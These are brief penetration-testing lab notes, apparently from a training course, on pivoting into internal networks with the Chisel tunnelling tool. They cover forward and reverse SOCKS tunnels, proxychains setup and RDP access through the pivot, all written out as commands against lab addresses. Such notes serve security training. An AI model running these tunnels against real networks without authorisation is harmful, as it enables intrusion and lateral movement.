Skip to content
  • https://github.com/jpillora/chisel
  • written in GO. uses HTTP to transport data, secured with SSH

Scenario - access internal host from attackbox by running Chisel on pivot

Workflow

  • download chisel from github
  • go build

Copy chisel binary to the pivot - scp chisel ubuntu@10.129.202.64:~/

Run chisel on pivot host - ./chisel server -v -p 1234 --socks5 - Listen on port 1234 - Forward every request to all networks accessible from the pivot host

Connect to the Chisel server (pivot) from Pwnbox - ./chisel client -v 10.129.202.64:1234 socks - Returns the Listener port for the pwnbox - If issues, use this chisel version - https://github.com/jpillora/chisel/releases/tag/v1.7.4

Modify proxychains - Add the above listener port to /etc/proxychains.conf

Execute commands - proxychains xfreerdp /u /v /p

Chisel Reverse Pivot

  • The server has to specify --reverse
  • The client has to specify R:socks - for reversed
  • The server will listen and accept connections, and they will be proxied through the client

Workflow:

Chisel server on PWNBox - sudo ./chisel server --reverse -v -p 1234 --socks5

Connecting the Chisel Client (pivot) to PWNbox - ./chisel client -v 10.10.14.17:1234 R:socks

  • Confirm proxychains has port number specified in client response
  • Execute commands on the PWNBox with proxychains